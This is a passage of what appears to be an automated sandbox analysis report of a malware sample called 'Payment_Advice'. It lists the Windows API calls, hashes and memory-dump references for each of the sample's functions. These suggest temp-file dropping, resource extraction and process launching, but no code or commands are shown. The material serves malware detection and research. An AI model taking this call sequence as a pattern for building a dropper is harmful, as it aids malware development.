                                                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A3F6
                                                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A408
                                                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A415
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A41A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                                      • API String ID: 1993255246-2943376620
                                                      • Opcode ID: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
                                                      • Instruction ID: b8eaa96d95d423bee739d1602c6bca055f31ac76d99c59a5b90b98edd4677545
                                                      • Opcode Fuzzy Hash: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
                                                      • Instruction Fuzzy Hash: 84F0BE362012193B82102BB5AC4CEAB3EACDEC6765701403AF905E2256DAA88C1082BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualProtect.KERNELBASE(-00001000,00001000,00000004,?,?), ref: 0041B72E
                                                      • VirtualProtect.KERNELBASE(-00001000,00001000), ref: 0041B743
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
                                                      • Instruction ID: 845c112435ebdd20d252d0e7b86ba5fa5c066f1ca220771698299a65b16c9747
                                                      • Opcode Fuzzy Hash: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
                                                      • Instruction Fuzzy Hash: 5472AE315083558FD324CF28C8806AABBF1FF99384F154A2EE9A5CB351E375D985CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040100F
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                        • Part of subcall function 0040DA70: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
                                                        • Part of subcall function 0040DA70: TlsAlloc.KERNEL32 ref: 0040DA87
                                                        • Part of subcall function 00409780: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789
                                                        • Part of subcall function 004092A9: RtlInitializeCriticalSection.NTDLL(004176A8), ref: 004092D1
                                                        • Part of subcall function 00408A2E: memset.MSVCRT ref: 00408A3B
                                                        • Part of subcall function 00408A2E: 753CE3E0.COMCTL32(00000008), ref: 00408A55
                                                        • Part of subcall function 00408A2E: CoInitialize.OLE32(00000000), ref: 00408A5D
                                                        • Part of subcall function 004053B5: RtlInitializeCriticalSection.NTDLL(00417680), ref: 004053BA
                                                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A058
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A071
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A07B
                                                        • Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(00000000,00000034), ref: 00409F9B
                                                        • Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(FFFFFFF5,00000008), ref: 00409FB0
                                                        • Part of subcall function 0040D80A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
                                                        • Part of subcall function 0040D80A: memset.MSVCRT ref: 0040D875
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040195B: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
                                                        • Part of subcall function 0040195B: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
                                                        • Part of subcall function 0040195B: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE
                                                      • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011A5
                                                      • HeapDestroy.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011B5
                                                      • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011BA
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$Allocate$Free$CreateInitializememset$CriticalErrorExitHandleLastLibraryProcessSectionValue$AllocDestroyEnumLoadModuleResourceTypes
                                                      • String ID:
                                                      • API String ID: 784591235-0
                                                      • Opcode ID: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
                                                      • Instruction ID: 96b79c542ec5316184d4d87f6a3bcb960f47177df14ebed8d3aa0abc3d7ae58b
                                                      • Opcode Fuzzy Hash: 6c79cbe8f93d5f4fbd4f8e4e936ecf2706f6c11da608655b243cf5d1c1f38f14
                                                      • Instruction Fuzzy Hash: B7316271B84701A9E210FBF39C43F9E29289B0874CF51803FB655B50E3DEBD99458A6E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A771
                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7B2
                                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,-00000004,?,00000000,00000000), ref: 0040A7FC
                                                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,-00000004,?,00000000,00000000), ref: 0040A81E
                                                      • RtlAllocateHeap.NTDLL(00000000,00001000,?), ref: 0040A857
                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040A8AA
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: File$Create$AllocateHeapPointer
                                                      • String ID:
                                                      • API String ID: 1439325152-0
                                                      • Opcode ID: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
                                                      • Instruction ID: 6d6c67b9194597d88171865bc2adb6fdabd1a806897bce184725f7e599815194
                                                      • Opcode Fuzzy Hash: ec1f5bb4b2b6a5a964d79ad446a806c37e3583e26d78157729372fc9161ccaeb
                                                      • Instruction Fuzzy Hash: 7251D472600300ABE3219F24DC44B67BAE5EB44764F248A3AF941B73E0D775DC56CB4A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                      • GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018
                                                      • GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 0040206D
                                                      • PathAddBackslashW.SHLWAPI(00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000), ref: 00402078
                                                      • PathRenameExtensionW.SHLWAPI(00000000,00000000,00000000,00416020,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000), ref: 004020B7
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FileNameTempValue$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                                      • String ID:
                                                      • API String ID: 2266526482-0
                                                      • Opcode ID: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
                                                      • Instruction ID: 388e51baf881495eeb61f06cd03d467195245f6dd8312115448fbdabe8adfc61
                                                      • Opcode Fuzzy Hash: 7a206639082f4f66d61dff5ee69ae7d05d1e4220445a0badcf27ca9ec711b6dd
                                                      • Instruction Fuzzy Hash: E041D9B1518300BAD601FBA1DC92E7E7B7DEBC4318F10983FB541B50A3CA3D98599A6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(004175FC), ref: 0040D49A
                                                      • RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0040D4D1
                                                      • RtlLeaveCriticalSection.NTDLL(004175FC), ref: 0040D52A
                                                      • RtlAllocateHeap.NTDLL(00000000,00000038,00000000), ref: 0040D53B
                                                      • RtlInitializeCriticalSection.NTDLL(00000020), ref: 0040D577
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AllocateHeap$EnterInitializeLeave
                                                      • String ID:
                                                      • API String ID: 2823868979-0
                                                      • Opcode ID: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
                                                      • Instruction ID: a50e7e251860d517ee994747b31fe6338d0b473a1999477304611f5aff0d6b84
                                                      • Opcode Fuzzy Hash: 4bf7ea97ea329fa424e8d9f5269964eaecfc693dbc8ce15ea364cb583d4705d7
                                                      • Instruction Fuzzy Hash: 483180B2D00702ABC3208F99EC44A56BBF5FB44714B15863FE855A77A0D738E948CB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000), ref: 00401DBA
                                                      • ShellExecuteExW.SHELL32(?), ref: 00401E4B
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CodeExecuteExitPathProcessQuoteShellSpaces
                                                      • String ID: open
                                                      • API String ID: 1854933444-2758837156
                                                      • Opcode ID: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
                                                      • Instruction ID: df19a793e904a2cb908132f9fea35eb48c66dc9965ad0194baf149ad38cba133
                                                      • Opcode Fuzzy Hash: 7e819a3d5a7f870c9bd56f0fd19ad2b4d7cb6ff0937053f34f3cc5d708bd95d3
                                                      • Instruction Fuzzy Hash: 1C310F71908305AFD700FFA1D895A5FB7A9EF84704F10883EF448A6192D77CE909DB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DC00: TlsGetValue.KERNEL32(0000000E), ref: 0040DC17
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 004092D8: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401991,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004092F4
                                                        • Part of subcall function 004092D8: wcscmp.MSVCRT ref: 00409302
                                                        • Part of subcall function 004092D8: memmove.MSVCRT ref: 0040931A
                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
                                                      • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
                                                      • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                      • String ID:
                                                      • API String ID: 983379767-0
                                                      • Opcode ID: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
                                                      • Instruction ID: 459b1afe37edd6916da7380a986df78a8a6a67bc14a1ea681291f0eb1f2bbc51
                                                      • Opcode Fuzzy Hash: 0bbe8ff36aa40c6eb343e0262a3b2aebc2b774ffe92d4b4111da8ccaba0cf12f
                                                      • Instruction Fuzzy Hash: 5B51FDB5A18300BAE600BBB29D86E7F766DDBC4718F14883FB541B50D3DA3CD8495A2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40ac60 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040AC98
                                                      • memcpy.MSVCRT ref: 0040ACD2
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: FilePointermemcpy
                                                      • String ID:
                                                      • API String ID: 1104741977-0
                                                      • Opcode ID: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
                                                      • Instruction ID: ce1a83e1c3ead8ae0272be6989b960d763ef5069eb00787365914be1b681847d
                                                      • Opcode Fuzzy Hash: 776d8269a3d3746020e46fe0c54eccab37ce39e43103cfadf76d72bca42313a5
                                                      • Instruction Fuzzy Hash: DA31593A2047009FC220DF29E844EABB7E5EFD8315F04882EE59AD7750D235E919CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40db00 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                      • TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                      • RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                      • RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap$Value
                                                      • String ID:
                                                      • API String ID: 2497967046-0
                                                      • Opcode ID: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
                                                      • Instruction ID: f09a8abe608f87049d0136dfdb2c949314b1adfa7a33e0a903a3785f462648d7
                                                      • Opcode Fuzzy Hash: 46ca97734aea4665f2f9378206e7e0527e4e1eeabe6324ccb875226dbc3139c5
                                                      • Instruction Fuzzy Hash: 8411CB74A00208FFC704DF98D894E9ABBB6FF89314F10C169E9099B394D735AE41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40a305 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectorywcslenwcsncpy
                                                      • String ID:
                                                      • API String ID: 961886536-0
                                                      • Opcode ID: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
                                                      • Instruction ID: 9db04ce1a0381f01c02530f667c42a9535ab4d679698852ad046a5b866225bd9
                                                      • Opcode Fuzzy Hash: aa1a62586f507797d6a03f634a25732ecab3933eb8c248249a2aef9f2aa5f9c0
                                                      • Instruction Fuzzy Hash: CA016CB140131896CB24DB74C85DAAEB364DF04304F2441B7DD15E21D1E7799AA4DB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 408a2e (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Initializememset
                                                      • String ID:
                                                      • API String ID: 640720207-0
                                                      • Opcode ID: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
                                                      • Instruction ID: ac5f13dc28c04c2a22c35059db173eb0360c4c60f11cda37de6548a0ec479162
                                                      • Opcode Fuzzy Hash: d470925c7e0f1dc52620b8a1c10874dd07e431f23b4b855a0d6157dcd2eba0ed
                                                      • Instruction Fuzzy Hash: 18E0ECB594030CBBEB409FD0EC0EF9DBB7CEB05705F4045B9F904A6281EBB5A6088B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 403a79 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DC60: wcslen.MSVCRT ref: 0040DC77
                                                        • Part of subcall function 0040DB00: RtlReAllocateHeap.NTDLL(03410000,00000000,?,?), ref: 0040DB5C
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000), ref: 00403ED2
                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,004033DD,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                        • Part of subcall function 00405E30: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,?,?,00001000,004033E5,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405E81
                                                        • Part of subcall function 004031B1: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,00403F71,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004031D9
                                                        • Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00403F90,00000001,00000000), ref: 00401FC3
                                                        • Part of subcall function 00401EF4: GetTempFileNameW.KERNEL32(00416020,00000000,00000000,00000000,00000000,00416020,00000000,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402018
                                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403FCB
                                                        • Part of subcall function 00409500: SetEnvironmentVariableW.KERNELBASE(?,?,00403FE8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00409519
                                                        • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,00000000,00000000,00000000,?), ref: 004054A5
                                                        • Part of subcall function 0040548C: RtlEnterCriticalSection.NTDLL(00417680), ref: 004054B7
                                                        • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000), ref: 004054CE
                                                        • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00403140,00000000,00000000,00000000,0000000A,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004054DA
                                                        • Part of subcall function 0040548C: RtlLeaveCriticalSection.NTDLL(00417680), ref: 0040551D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Value$AllocateCriticalErrorFileHandleHeapLastNameSectionTemp$BackslashCharCloseCreateEnterEnvironmentFindLeaveModuleObjectPathRemoveResourceSingleThreadUpperVariableWaitwcslen
                                                      • String ID:
                                                      • API String ID: 1263086577-0
                                                      • Opcode ID: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
                                                      • Instruction ID: f5a9b2353c4208d2d2e49e7cbb2e39cfe29240165c79b9212fe679793e11b04d
                                                      • Opcode Fuzzy Hash: b82d4a2b996f595ba5c1d763e67e136d9313fe1510dfd2df2d4df1b3f91113b9
                                                      • Instruction Fuzzy Hash: 7402AAB5A18300AED200FBB1998197F7BBCEBC8719F10D83FB545A6192C63CD9459B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40aa00 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                        • Part of subcall function 0040D0D8: RtlEnterCriticalSection.NTDLL(00000020), ref: 0040D0E3
                                                        • Part of subcall function 0040D0D8: RtlLeaveCriticalSection.NTDLL(00000020), ref: 0040D15E
                                                      • CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,0040352F,00000000,00000000,00000000), ref: 0040AA33
                                                      • RtlAllocateHeap.NTDLL(00000000,00001000), ref: 0040AA55
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                                      • String ID:
                                                      • API String ID: 2608263337-0
                                                      • Opcode ID: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
                                                      • Instruction ID: 0c7c59af070097b429fff24e53322bbcd4a548db6c14e4240a8466396a0194e3
                                                      • Opcode Fuzzy Hash: 777222757d6ac8f310b92d6d48f0c472615004c48d60ff8c3faa9f498e70ad84
                                                      • Instruction Fuzzy Hash: 5B11BE71200700ABC2308F5AED48F57BBE8EBC4724F11823EF495A22E0D7769819CF69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40d80a (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                        • Part of subcall function 0040D95D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040D81B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00416078,00417070,00000004), ref: 0040D99E
                                                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
                                                      • memset.MSVCRT ref: 0040D875
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateFreememset
                                                      • String ID:
                                                      • API String ID: 2774703448-0
                                                      • Opcode ID: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
                                                      • Instruction ID: 8aac43452d1df7e7ddc7facaec918d90005b782c0e071f0a612a12749f5edab4
                                                      • Opcode Fuzzy Hash: eda7e802ff362bb19e632be6cfc426e8d69579a7f719dd62f808040715c8de4f
                                                      • Instruction Fuzzy Hash: D71151729047159BC310EF59DC80A4BBBE8FF98710F05852EF998A7351D734EC048BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                       Control-flow Graph: function 40a610 (rendered graph with Executed / Not Executed block legend; graph omitted)
                                                      APIs
                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403573,00000000,00000000,00000800,00000000,00000000,00000000), ref: 0040A653
